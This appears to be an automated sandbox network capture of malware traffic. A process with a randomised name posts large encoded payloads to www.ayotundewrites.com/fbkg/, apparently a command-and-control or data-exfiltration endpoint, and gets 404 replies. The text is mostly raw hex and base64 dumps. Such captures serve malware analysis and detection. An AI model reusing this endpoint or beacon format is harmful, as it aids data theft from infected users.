                                                                                                                                                                                                Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                5383.229.19.7680192.168.11.2050180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:59.410080910 CET1130OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ayotundewrites.com
                                                                                                                                                                                                Referer: http://www.ayotundewrites.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 5a 73 50 41 7a 64 71 73 66 6a 63 32 59 5a 48 34 48 2f 55 44 59 33 6f 6c 61 77 33 49 4c 6b 69 74 46 45 6f 56 6d 49 43 42 61 5a 69 30 67 51 46 6d 6f 6e 50 4a 35 2b 77 56 6e 4c 76 4f 73 45 4b 72 43 43 52 2b 6b 34 6d 37 30 4a 63 4c 6c 6f 64 52 62 6c 73 63 72 48 4e 4c 59 61 4d 69 67 39 6f 6f 52 38 51 42 77 6e 39 46 58 6c 70 62 34 4e 77 44 56 70 2f 57 56 55 6a 42 64 31 72 46 6a 61 35 44 6c 37 78 78 51 69 77 76 2f 51 70 62 34 53 36 51 39 58 39 6c 4c 49 61 4c 56 55 4b 52 42 59 62 31 6d 6c 65 52 52 4d 72 51 51 6d 33 4b 36 57 79 36 65 6f 6e 56 56 58 62 66 2b 38 4c 58 76 70 62 69 33 61 68 68 4e 33 62 32 45 33 4f 30 79 7a 48 34 53 50 7a 56 54 76 71 61 51 2b 4b 79 6a 6a 6c 52 4e 58 77 69 67 7a 78 77 43 54 77 70 36 5a 61 47 4c 39 72 6e 79 77 36 78 54 2b 7a 2b 6a 73 56 72 47 55 39 64 4e 54 53 64 43 58 64 37 31 34 73 51 48 64 66 74 5a 50 52 54 33 66 48 65 53 62 79 73 61 71 62 69 35 4a 4e 4e 35 59 72 32 62 49 4b 37 6b 31 42 64 71 59 58 57 71 76 77 74 46 49 4d 4c 2b 57 76 52 78 4d 50 78 70 44 34 54 73 48 50 31 78 71 45 37 33 76 62 79 6d 4c 2f 54 6a 47 35 4e 50 51 66 6e 35 66 4f 4e 4f 38 61 48 35 66 4e 41 59 48 77 49 55 55 6f 77 6e 52 72 6b 53 74 30 59 45 66 33 76 71 5a 63 4c 5a 6f 46 49 68 68 65 32 32 4d 6b 6b 6d 53 67 39 6b 32 68 37 79 67 74 6f 59 36 7a 5a 57 43 7a 54 41 78 42 67 46 33 65 4a 6a 37 43 67 66 75 2f 6b 6d 58 79 7a 43 75 36 68 4c 78 6b 32 2b 65 76 36 52 31 5a 74 44 64 4a 61 34 55 73 44 2b 41 7a 73 62 2b 68 7a 41 37 5a 50 48 68 47 2b 4c 6c 76 43 76 41 54 74 6a 36 63 49 71 6d 51 58 49 75 35 42 30 51 39 44 54 36 48 37 59 56 48 2b 4f 6c 41 47 75 55 41 49 41 31 7a 43 62 65 74 44 75 6c 55 57 42 37 66 39 76 55 6f 52 67 4e 70 30 6f 67 2b 5a 74 62 43 77 76 79 6b 6a 79 6e 31 4d 44 4b 38 59 54 56 58 34 66 47 39 69 59 57 38 51 6b 30 5a 54 67 4e 48 37 54 57 2b 71 50 7a 5a 4a 6e 38 2f 7a 6e 71 7a 53 72 74 62 68 69 47 58 61 69 70 75 34 67 70 37 59 44 37 65 36 41 63 72 63 71 2f 47 48 61 46 4b 49 68 79 4a 73 4a 73 6b 34 38 54 7a 30 6a 53 49 6c 70 38 34 30 66 52 7a 57 44 2f 4f 63 49 34 67 52 6f 6b 35 78 59 64 64 57 62 2f 68 4b 47 52 53 78 58 67 68 4b 51 6e 58 73 68 58 72 6b 46 7a 4a 58 39 56 67 46 30 38 51 44 56 4f 34 39 49 74 36 4b 2b 44 69 63 74 75 79 6c 4d 6e 39 62 7a 36 45 72 39 36 4c 67 61 51 76 31 30 44 35 59 72 77 55 6a 37 6c 57 2b 70 70 4e 75 2f 74 52 69 41 65 2b 2f 79 37 44 51 45 6f 52 74 51 45 78 6d 58 37 58 49 67 66 56 2f 55 39 77 45 4d 6d 70 42 48 71 38 6d 64 6a 44 71 53 6e 43 39 4a 58 70 34 32 74 70 67 46 44 75 4f 52 32 48 31 4c 59 44 51 65 36 79 6e 4b 6a 4b 61 2b 57 71 2b 36 75 53 55 59 77 71 79 37 62 69 57 62 59 6f 70 56 58 32 4f 68 70 76 38 38 32 31 69 55 65 63 47 48 7a 41 34 36 64 53 6b 58 74 66 6f 45 68 68 39 58 48 47 69 72 75 31 4f 67 63 66 2b 76 39 36 76 7a 73 65 47 49 2f 45 6f 73 4f 44 34 77 76 76 35 42 6c 63 6f 2f 67 47 4a 48 77 35 65 71 46 62 34 2f 79 39 66 41 51 71 59 66 61 37 79 53 7a 46 4f 43 2f 7a 4d 69 59 4a 4d 35 76 6a 67 32 43 56 64 41 6e 64 69 57 4c 76 69 64 74 4a 41 38 44 45 55 35 70 43 4b 62 31 45 65 31 69 66 46 65 62 73 41 38 72 43 36 2f 33 35 75 38 44 76 62 2b 79 49 64 44 66 59 6f 30 75 47 2f 4e 2b 79 72 36 51 6b 4a 50 6b 33 46 6d 74 42 63 61 4e 62 49 64 61 56 66 6e 50 61 79 50 4e 67 51 38 58 4d 45 36 38 65 75 37 36 64 51 7a 6c 2f 2b 79 41 71 68 38 37 75 34 79 62 6c 54 74 53 67 54 4d 59 43 52 4c 50 64 65 6b 34 4b 55 4d 39 66 57 73 6c 71 68 46 36 71 55 79 43 44 50 59 62 42 42 7a 50 42 44 76 69 56 77 78 67 49 63 53 45 6e 56 76 59 5a 64 2b 70 75 7a 75 4e 6d 30 32 2b 75 42 53 71 51 4f 74 6b 72 79 6a 64 63 31 4f 35 4e 43 6d 73 30 56 67 79 75 78 70 47 58 78 78 79 76 6d 45 6f 51 76 56 33 59 79 33 77 68 76 2f 51 6e 4c 6a 53 75 67 50 51 74 37 76 79 64 58 31 6a 68 58 32 5a 64 4e 52 67 58 2f 68 71 63 56 57 61 6c 31 52 73 43 52 46 6c 4e 31 64 34 57 5a 51 61 52 62 4d 38 43 47 44 2f 30 4d 59 34 47 47 62 4f 31 68 76 4a 4e 44 6c 53 74 46 62 4f 35 4d 69 77 59 50 6c 55 65 52 44 34 64 32 30 61 79 77 6b 72 70 46 61 75 54 77 44 62 2b 64 44 4c 4c 6f 5a 6e 76 78 6b 4f 44 6e 34 63 47 4e 71 62 43 4d 74 79 55 64 58 62 44 66 2b 44 44 6d 36 71 49 6a 4b 51 6e 41 6a 74 39 45 61 39 71 78 33 57 2b 58 58 50 6d 41 5a 69 47
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594084978 CET1133OUTData Raw: 57 57 4c 51 58 4f 47 35 44 64 75 63 62 55 45 73 7a 52 2f 37 78 43 2b 72 63 64 59 72 4f 75 31 4a 50 32 59 71 6d 48 72 52 4f 78 4f 47 4f 50 78 71 54 5a 64 44 44 54 4a 54 59 51 4a 38 46 51 47 68 73 66 74 71 4f 56 6d 4f 73 37 7a 45 33 4a 6c 6a 66 71
                                                                                                                                                                                                Data Ascii: WWLQXOG5DducbUEszR/7xC+rcdYrOu1JP2YqmHrROxOGOPxqTZdDDTJTYQJ8FQGhsftqOVmOs7zE3JljfqjBKkoVOtA+k30t6sIH73Lxwh8pbuoziwgRIeMBrFmNGBC7dkqoVHm08zPTd12h7jHUbnLsn/aVeS8wbASb1maNN8zBjnR9L8hnKtKeN1EeJ+b06C7bnsIruVt/TF3F/SZk03aqGxaiP1LZwuFKICnnBhJlHysPp6q
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594329119 CET1135OUTData Raw: 56 32 46 2f 43 66 48 64 59 70 47 35 70 54 32 72 2f 2f 65 73 6f 31 31 33 79 66 39 70 47 30 6a 73 69 55 78 73 67 79 32 32 61 53 76 37 44 36 57 37 35 47 4c 55 79 6c 76 4d 4d 54 44 4c 64 5a 6c 65 4e 70 6f 54 61 6e 53 57 46 63 33 6c 61 75 32 6a 77 39
                                                                                                                                                                                                Data Ascii: V2F/CfHdYpG5pT2r//eso113yf9pG0jsiUxsgy22aSv7D6W75GLUylvMMTDLdZleNpoTanSWFc3lau2jw9UfW/tFJ0CPgOyPACDU+NL1StQC2J8ZZWVvA6xvZWkYASFnCdDeuaP5NhZb0TkezTCbsmGpHwXpea1ZGOcG2o3BFS/yNig94fguqir1TyZ68Xv1OByIz79JefRfB/Kbr2X1qUDaWxe5bvGGp/Z6NZwb4nFqmt934oZ
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594504118 CET1143OUTData Raw: 62 63 7a 35 4f 50 72 77 73 36 74 36 37 4b 44 33 33 74 30 36 68 78 48 4a 72 37 6a 55 57 70 6e 6b 35 63 79 58 44 6a 75 53 49 74 7a 70 76 6b 6a 37 35 6b 4d 55 39 4a 68 30 6b 31 4e 6f 4e 66 43 30 71 46 77 41 6a 42 6a 30 49 34 52 71 52 58 52 70 66 45
                                                                                                                                                                                                Data Ascii: bcz5OPrws6t67KD33t06hxHJr7jUWpnk5cyXDjuSItzpvkj75kMU9Jh0k1NoNfC0qFwAjBj0I4RqRXRpfEwGG9ARoT0ubCF9dbfzrE/sC4pbXaewFwcYIb2rGTF8sul+pIvFDaZH7X+5jTDYuUog0EoD2oMMj9s2VbmOWFaWuEd5dfrB0xv5N7H+Li13cQHuVWaH/zhxEfY6zhkkghlG/EtAhaZl/kXkeMLe3aF5Kj1sY8hJjRE
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594667912 CET1145OUTData Raw: 37 4d 48 58 39 30 75 73 35 65 63 2f 4b 69 2b 41 30 47 54 56 73 63 75 76 65 39 34 52 73 36 64 57 67 69 76 79 73 79 6d 6b 66 5a 4b 43 57 48 39 38 4a 6f 72 54 6c 70 6f 4d 4e 68 7a 64 70 5a 6c 4f 33 4b 66 6c 32 65 2b 44 73 41 74 42 4f 54 6b 30 43 73
                                                                                                                                                                                                Data Ascii: 7MHX90us5ec/Ki+A0GTVscuve94Rs6dWgivysymkfZKCWH98JorTlpoMNhzdpZlO3Kfl2e+DsAtBOTk0Csx6HnvT40gmub1u9LOE8DDclEdpO+X8m9g2SP6mwVP5/8FX9T3hairzdkq8gvKN9Nmw1eLaebVmOUKSebsHNJAHXBTYJyf5/z0rBtphw6Gn31ggXBP1MXu3yiqIVx1FMhQypxI8px77MQlWjez6JRAj9JqnZihSa/x
                                                                                                                                                                                                Nov 17, 2023 19:30:59.595024109 CET1156OUTData Raw: 33 44 77 51 43 4d 34 77 61 6c 7a 64 42 44 6c 67 63 47 45 47 58 64 4c 6b 4e 56 2b 31 75 51 7a 71 7a 79 37 2f 75 78 33 79 78 2f 4e 56 58 78 50 61 63 68 77 34 56 61 43 41 77 49 62 51 75 78 49 73 6a 4e 67 31 70 34 73 34 7a 76 64 65 6e 6f 56 58 59 41
                                                                                                                                                                                                Data Ascii: 3DwQCM4walzdBDlgcGEGXdLkNV+1uQzqzy7/ux3yx/NVXxPachw4VaCAwIbQuxIsjNg1p4s4zvdenoVXYAE9wM/hrAgmQooKDj0EXaijT5IGH0NRewC1yAzzKfJ9IrwkWvPMv0nCtD88gTqS4O8yQij4auhIThCFEtkQiEZbjMiWZzvXjg2IV/6NvXwK2/vP2e61B25yEBSbT/cet/Xtzy8DwOqyYM+Df4gvkrY/BtqXoNTBKQF
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778086901 CET1158OUTData Raw: 2f 37 48 35 57 41 73 44 67 39 51 6c 6d 6e 4c 30 33 4f 6b 56 41 6a 2f 75 2f 31 4d 34 76 50 38 2f 49 49 74 41 43 72 54 68 5a 53 7a 48 53 66 51 30 63 70 6f 62 43 78 56 50 4a 6c 71 53 55 6f 75 68 59 38 6a 75 73 79 32 6c 7a 2b 36 38 54 73 37 50 48 55
                                                                                                                                                                                                Data Ascii: /7H5WAsDg9QlmnL03OkVAj/u/1M4vP8/IItACrThZSzHSfQ0cpobCxVPJlqSUouhY8jusy2lz+68Ts7PHUGPVgVoIyxSljdHkMzvViRI2UskdNNC01PTPHrnTw/RKS7s+gErZawF3TZUznVBweMF3NR1Gl/D9/QIyl2+TPmpEulNmkU9zE6yRFyFmXFCuO5wNNsrtptBfowZtnBeY0uzGcDSpKwlTeoBRtw3pehw8odcYNFCtYL
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778242111 CET1161OUTData Raw: 37 4d 70 6e 58 64 47 34 54 52 4c 62 6e 45 47 75 77 42 6d 69 56 33 47 37 37 45 72 45 69 67 47 53 68 78 65 61 6a 4b 4a 62 38 35 58 50 39 37 47 67 6c 51 6e 56 49 66 71 32 55 71 42 58 66 59 73 47 58 37 67 6b 47 61 4d 76 47 59 55 4f 44 42 4e 30 7a 56
                                                                                                                                                                                                Data Ascii: 7MpnXdG4TRLbnEGuwBmiV3G77ErEigGShxeajKJb85XP97GglQnVIfq2UqBXfYsGX7gkGaMvGYUODBN0zVe53C/DeHSFILDR2H4H43jymunv8zQ/op7EyoMdzat4HT//sT5deOQ3R2hId0v71PBEPmD0BSxG2YLzQhhbxUT/7yeVzMs+khHaZoYQXbeaPYymjkHYCb4VIrjjwUo70DVW7nAPE/47NZubCPwiaTjjrZnObLz4YMY
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778574944 CET1162OUTData Raw: 48 49 33 46 58 73 55 4a 69 33 47 62 5a 41 32 56 6b 46 78 4f 6b 44 6b 4b 50 50 52 55 56 4d 53 4d 57 78 57 6f 57 73 6e 48 33 55 69 42 32 68 33 69 71 4b 55 4a 52 6a 2f 64 32 6e 51 34 59 63 37 2f 72 6b 6f 38 71 4f 6e 79 42 46 66 73 62 51 31 36 78 44
                                                                                                                                                                                                Data Ascii: HI3FXsUJi3GbZA2VkFxOkDkKPPRUVMSMWxWoWsnH3UiB2h3iqKUJRj/d2nQ4Yc7/rko8qOnyBFfsbQ16xDlvy0x3oZatXKmCAbxwrSFzQDx8kscRPYPn4ZzpUywQpFxmSN41HOT35teDTsxiYpW2hLoVBr0Ttq0wuqk8q6epMrwPhu4WVckWwrbG6ExAsIg0kpTyCvFtqsG0csUZrBoOTcVxu+5fWosV3uE8F+IIvUPT2Uy3Qn0
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778985023 CET1164OUTData Raw: 65 68 61 77 32 2f 48 45 45 50 4b 71 32 7a 67 6c 34 4c 7a 77 35 6f 39 59 64 67 4d 78 46 35 4e 4b 5a 66 78 2f 51 68 6f 56 57 6a 51 36 73 62 77 52 76 53 72 44 6f 66 43 42 64 4d 59 56 74 33 53 78 6c 62 7a 72 45 58 74 48 75 6c 75 4d 44 4f 63 39 56 4f
                                                                                                                                                                                                Data Ascii: ehaw2/HEEPKq2zgl4Lzw5o9YdgMxF5NKZfx/QhoVWjQ6sbwRvSrDofCBdMYVt3SxlbzrEXtHuluMDOc9VOpZmRe2V2I0GhEL0OVGH/mFshBdlPUsdXYXO5+7uz7KzoQfq5zkaguhrSc/LXoRa7yOOKZx1ZDSco7nDfBjaIVnUbftpAMkM0rpTZJ1pfG4sLvScqwsmBiDYm453x9z9xpJF9G+H4usdLxhBEfaCOMfvEeMJE7DhdD
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779154062 CET1166OUTData Raw: 33 71 58 63 38 77 6d 2b 67 68 45 72 4d 36 76 37 71 39 39 41 48 50 49 69 4d 58 74 48 6d 6a 64 5a 44 71 35 47 37 4f 31 67 4d 4b 2b 39 71 6b 69 64 57 47 63 39 54 69 54 7a 59 73 47 67 54 76 44 37 45 61 41 75 36 4d 71 35 46 77 66 7a 58 56 39 6f 78 76
                                                                                                                                                                                                Data Ascii: 3qXc8wm+ghErM6v7q99AHPIiMXtHmjdZDq5G7O1gMK+9qkidWGc9TiTzYsGgTvD7EaAu6Mq5FwfzXV9oxvHTv/JrbCD+Iny8yA1ZWNl5fguRvfUjy/SeS/Ow4/aTAt6g47rvHNDSXSpyGCI4iVAdqHEyv36g+AGGuGJCJSSQVgHrxB5wMsvH0J6lr3AiCMaBS9ek8Gn0D3qvNnvCguw1e92v06pBJ0nzqq0Z8eRs6GctK3nbh/s
                                                                                                                                                                                                Nov 17, 2023 19:31:00.145225048 CET1174INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:00 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 